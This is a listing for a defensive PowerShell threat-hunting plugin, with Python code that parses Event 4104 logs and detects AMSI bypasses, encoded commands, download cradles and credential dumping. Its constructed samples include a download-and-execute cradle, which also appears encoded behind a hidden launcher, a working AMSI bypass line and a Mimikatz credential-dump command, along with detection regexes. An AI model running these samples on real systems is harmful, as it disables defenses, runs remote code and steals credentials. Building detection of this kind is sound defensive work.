From cybersecurity-skills
Analyzes Windows EVTX files to detect malicious PowerShell activity including obfuscated commands, AMSI bypasses, encoded payloads, and credential dumping via Script Block Logging (Event 4104).
Slash command: /cybersecurity-skills:hunting-for-anomalous-powershell-execution
PowerShell Script Block Logging (Event ID 4104, written to the Microsoft-Windows-PowerShell/Operational log; PowerShell 7 writes the same event to PowerShellCore/Operational) records the text of every script block as the engine compiles it. Code that an attacker unpacks at runtime, for example a base64 string handed to Invoke-Expression, is therefore logged again in its decoded form as a separate 4104 event, which is what makes 4104 the primary data source for hunting malicious PowerShell. Combined with Module Logging (Event ID 4103) and process creation events (Security 4688 or Sysmon Event ID 1, which carry any -EncodedCommand argument on the command line), analysts can detect encoded commands, AMSI bypass patterns, download cradles, credential theft tools, and fileless techniques even when the attacker stacks several obfuscation layers. Two caveats when parsing: Script Block Logging must be enabled by policy (without it, PowerShell 5 and later only records blocks matching its built-in suspicious-content list, at Warning level), and long blocks are split across several 4104 events that share a ScriptBlockId and must be reassembled in MessageNumber order before any pattern matching.
Example of the summary counts the skill reports for an analyzed EVTX file:
{
"total_events": 1247,
"suspicious_events": 23,
"amsi_bypass_attempts": 2,
"encoded_commands": 8,
"download_cradles": 5,
"credential_access": 3
}
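The following is an added example, not code from the cybersecurity-skills plugin, showing the core of such an analysis: parsing 4104 events from an XML export (the shape produced by Get-WinEvent's ToXml()), reassembling fragmented script blocks by ScriptBlockId, decoding -EncodedCommand payloads (base64 of UTF-16LE), and counting hits in the same categories as the summary above. The four sample events, the WS01 host name, the 10.0.0.5 URL and the detection regexes are constructed for the demo and are deliberately minimal; a production hunt would use a far larger signature set.

```python
"""Hunt PowerShell 4104 Script Block Logging events exported as XML (added example;
input layout is what `Get-WinEvent ... | ForEach-Object { $_.ToXml() }` emits)."""
import base64
import json
import re
import xml.etree.ElementTree as ET
from collections import defaultdict
from xml.sax.saxutils import escape

NS = "{http://schemas.microsoft.com/win/2004/08/events/event}"

# Detection patterns, keyed by the summary counters in the skill's JSON output.
PATTERNS = {
    "amsi_bypass_attempts": re.compile(r"amsiInitFailed|AmsiUtils|AmsiScanBuffer", re.I),
    # -e / -ec / -enc / -EncodedCommand followed by a base64 blob, or explicit base64 decoding
    "encoded_commands": re.compile(r"-e[ncodedma]*\s+[A-Za-z0-9+/=]{20,}|FromBase64String", re.I),
    "download_cradles": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient|Start-BitsTransfer", re.I),
    "credential_access": re.compile(r"Invoke-Mimikatz|sekurlsa|lsass|MiniDump|DumpCreds", re.I),
}
B64_RE = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")  # candidate -EncodedCommand blobs


def decode_utf16_b64(blob):
    """Decode an -EncodedCommand payload (base64 of UTF-16LE text); None if it is not one."""
    try:
        text = base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None
    readable = all(c.isascii() and (c.isprintable() or c in "\r\n\t") for c in text)
    return text if text and readable else None


def parse_4104(xml_text):
    """Yield one dict per 4104 event from a concatenated ToXml() export."""
    root = ET.fromstring("<Events>" + xml_text + "</Events>")
    for ev in root.iter(NS + "Event"):
        if ev.findtext(f"{NS}System/{NS}EventID") != "4104":
            continue
        data = {d.get("Name"): (d.text or "") for d in ev.iter(NS + "Data")}
        yield {"computer": ev.findtext(f"{NS}System/{NS}Computer"),
               "id": data.get("ScriptBlockId"), "text": data.get("ScriptBlockText", ""),
               "num": int(data.get("MessageNumber") or 1),
               "total": int(data.get("MessageTotal") or 1)}


def reassemble(events):
    """Long blocks are split over several 4104 events; join them per ScriptBlockId."""
    frags = defaultdict(list)
    for e in events:
        frags[e["id"]].append(e)
    blocks = []
    for parts in frags.values():
        parts.sort(key=lambda e: e["num"])
        blocks.append({**parts[0], "text": "".join(p["text"] for p in parts),
                       "complete": len(parts) == parts[0]["total"]})
    return blocks


def analyze(xml_text):
    """Return (summary counts in the skill's JSON shape, per-block findings)."""
    summary = {"total_events": 0, "suspicious_events": 0, **{k: 0 for k in PATTERNS}}
    findings = []
    for blk in reassemble(parse_4104(xml_text)):
        summary["total_events"] += 1
        # Match on the raw text plus anything that decodes as an encoded command,
        # so a cradle hidden behind -enc is still caught.
        decoded = [d for d in map(decode_utf16_b64, B64_RE.findall(blk["text"])) if d]
        haystack = "\n".join([blk["text"], *decoded])
        hits = [name for name, rx in PATTERNS.items() if rx.search(haystack)]
        if hits:
            summary["suspicious_events"] += 1
            for h in hits:
                summary[h] += 1
            findings.append({"id": blk["id"], "computer": blk["computer"],
                             "complete": blk["complete"], "hits": hits, "decoded": decoded})
    return summary, findings


def make_4104(sbid, text, num=1, total=1, computer="WS01"):
    """Render one 4104 event in the ToXml() layout (constructed sample data)."""
    return (f'<Event xmlns="{NS[1:-1]}"><System><Provider Name="Microsoft-Windows-PowerShell"/>'
            f'<EventID>4104</EventID><Computer>{computer}</Computer></System><EventData>'
            f'<Data Name="MessageNumber">{num}</Data><Data Name="MessageTotal">{total}</Data>'
            f'<Data Name="ScriptBlockText">{escape(text)}</Data>'
            f'<Data Name="ScriptBlockId">{sbid}</Data><Data Name="Path"></Data></EventData></Event>')


# Constructed sample log: one benign block, one encoded launcher, one AMSI bypass
# split over two fragments, one credential-dumping command.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/a.ps1')"
ENCODED = base64.b64encode(CRADLE.encode("utf-16-le")).decode("ascii")
SAMPLE_XML = "".join([
    make_4104("b1", "Get-ChildItem C:\\Temp | Measure-Object"),
    make_4104("b2", f"Start-Process powershell.exe -ArgumentList '-nop -w hidden -enc {ENCODED}'"),
    make_4104("b3", "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"
                    ".GetField('amsiInit", 1, 2),
    make_4104("b3", "Failed','NonPublic,Static').SetValue($null,$true)", 2, 2),
    make_4104("b4", "Invoke-Mimikatz -Command '\"sekurlsa::logonpasswords\"'"),
])

if __name__ == "__main__":
    summary, findings = analyze(SAMPLE_XML)
    print(json.dumps(summary, indent=2))
    for f in findings:
        print(f["computer"], f["id"], f["hits"], f["decoded"])
```

Note that total_events here counts reassembled script blocks, not raw 4104 records (the two fragments of block b3 count once), and that the amsiInitFailed string only matches after reassembly because it straddles the fragment boundary; counting raw records instead silently under-reports such cases.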
Install:
npx claudepluginhub mukul975/anthropic-cybersecurity-skills --plugin cybersecurity-skills
Parses Windows EVTX files for malicious PowerShell via Event 4104/4103 logs, detecting AMSI bypasses, obfuscated commands, encoded payloads, credential dumping, and download cradles. For threat hunting and incident analysis.